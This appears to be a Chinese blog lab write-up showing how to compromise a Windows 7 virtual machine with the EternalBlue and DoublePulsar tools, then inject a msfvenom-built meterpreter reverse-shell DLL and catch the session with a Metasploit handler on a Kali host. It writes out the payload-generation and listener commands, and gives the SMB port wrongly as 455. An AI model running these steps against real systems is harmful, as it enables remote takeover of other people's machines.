Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN

Win7利用NSA Eternalblue 永恒之蓝 和fuzzbunch工具实现dll注入 Win 7 64CN

一、原理
1.Eternalblue可以利用SMB漏洞，结合Doublepulsar后，获取Windows 7 系统权限
2.漏洞存在环境
几乎所有开放455端口的Win系统
3. SMB
一个网络文件共享协议

二、实验准备

攻击机：win7 64 IP：192.168.226.128
靶机：win7 64 CN IP: 192.168.226.129
辅助攻击机：kali IP : 192.168.226.130

三、实验过程

设定IP

进入fb> use Eternalblue
一路enter 默认选项，只有下框中红色的选1

出现 Eternalblue Succeed代表攻击成功。
接下来是利用kali生成后门文件 1.dll

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.226.130 LPORT=8888 -f dll > 1.dll

其中lhost就是辅助攻击机的ip

然后打开 mfs6
$ msfconsole

输入以下命令：

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set LhOST 192.168.226.130
msf6 exploit(multi/handler) > set lport 8888
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

生成1.dll并且开始监听

将1.dll放入攻击机（使用VM TOOLS）

使用DoublePulsar执行后门

>use DoublePulsar

一路enter默认，注意以下设置
![在这里插入图片描述](https://img-blog.csdnimg.cn/eda0bbed3d9046a687dee44150f5f97a.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAUWlRaV9DbGlmZg==,size_20,color_FFFFFF,t_70,g_se,x_16

再enter，直到出现Doublepulsar Succeed,代表执行成功

再看kali，已经成功实现

欢迎指正交流！！！